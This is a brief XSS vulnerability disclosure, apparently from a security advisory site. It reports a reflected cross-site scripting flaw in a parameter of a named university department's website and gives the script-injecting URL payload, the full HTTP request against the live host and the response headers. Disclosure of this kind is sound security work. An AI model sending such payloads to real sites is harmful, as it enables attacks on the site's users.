İstanbul Teknik University XSS vul

2020.03.03
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

################################################################### # Exploit Title : İstanbul Teknik University Elektronik ve Haberleşme Mühendisliği Bölümü XSS # Author [ Discovered By ] : Furkan Özer # Date : 04/03/2020 # Vendor Homepage : http://www.ehb.itu.edu.tr/ # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Vulnerability Type : CWE-79 /index.php?bib='"()&%1<ScRiPt >prompt(912383)</ScRiPt>&id=bibtexbrowser&lang=tr&year=2016 Request GET /index.php?bib=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28912383%29%3c%2fScRiPt%3e&id=bibtexbrowser&lang=tr&year=2016 HTTP/1.1 Host: www.ehb.itu.edu.tr Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept: */* Response HTTP/1.1 200 OK Date: Mon, 02 Mar 2020 20:59:17 GMT Server: Apache Vary: Accept-Encoding Cache-Control: private, must-revalidate Expires: Mon, 02 Mar 2020 21:09:17 GMT Content-Length: 17802 Keep-Alive: timeout=15, max=31 Connection: Keep-Alive Content-Type: text/html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top